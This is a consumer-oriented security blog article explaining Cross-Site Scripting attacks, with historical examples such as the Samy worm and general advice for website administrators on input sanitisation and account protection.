Getting to know these highly customizable cyberattacks and how to protect yourself from them
You wouldn’t think an attack method that was first found more than 20 years ago would be at the top of anyone’s list of popular current attacks. But that is the case for Cross-Site Scripting (XSS), a method that was first discovered by Microsoft engineers at the turn of the century.
Our XSS explainer webpage goes into more detail about the different attack types and some of the more notable attacks and victims down through the years. Top marks were issued by MITRE’s Common Weakness Enumeration group, which also listed 24 other dangerous software weaknesses. Other malware-watchers have also attested to XSS’ popularity over the years, such as being #7 on the list of the OWASP top ten website vulnerabilities back in 2017.
The basic idea is to take a targeted website and inject some code into its webpages so it loads content from other domains. This could take the form of a malicious login page, a set of session web cookies that can load malware, or a SQL injection or other kinds of compromises. A user is tricked into clicking on a malicious link to start things up. At that point, the user could divulge their passwords or permit an attack to take remote control over their PC completely, depending on the design of the malware.
One of the more infamous XSS attacks was called Samy, which infected more than one million users back in 2005 in less than a day. The malware wasn’t all that dangerous, except for its author, Samy Kamkar, who ended up paying a $15,000 fine and having to spend three years without any internet connection on probation.
XSS shows up in many places as just a supportive player in the malware attack. One infamous attack was seen by Uber back in 2018. HackerOne paid out a bug bounty of $3,000 to fix the issue. Another more recent example was seen last month, in which XSS played a role in fooling users into thinking they were dealing with a legitimate tech support person. In this particular case, the scammer was able to convince its victims to pay for the support to “unlock” their browsers, making use of XSS within one of the multiple deception layers used by the scammers.
So what can you do if you administer a website? There are numerous helpful resources, include these two cheat sheets from OWASP (1, 2) that involve cleansing your inputs. “Basically, you want to employ a combination of validating, filtering, encoding and escaping methods to prevent untrusted user input from executing on the web app,” says George Mathias in his Medium blog post. That post also has more details about historical XSS attacks and other suggestions. If you run a WordPress blog, here are a few suggestions to improve your site’s security posture. Some of these apply to any web server installation, such as choosing something other than “admin” as your site login and employing multi-factor authentication protection.
In support of the International Day for the Elimination of Violence Against Women, Avast CISO Jaya Baloo describes the increased use of stalkerware during 2020 and the correlation between stalkerware and abusive relationships.
Discover how cybersecurity evolved and what prominent cyberattacks led to innovations in online protection.
Peiter Zatko, also known as the famous hacker “Mudge,” is the new head of security at Twitter, where he plans to bring creative solutions to the social platform’s notoriously poor security and preponderance of misinformation.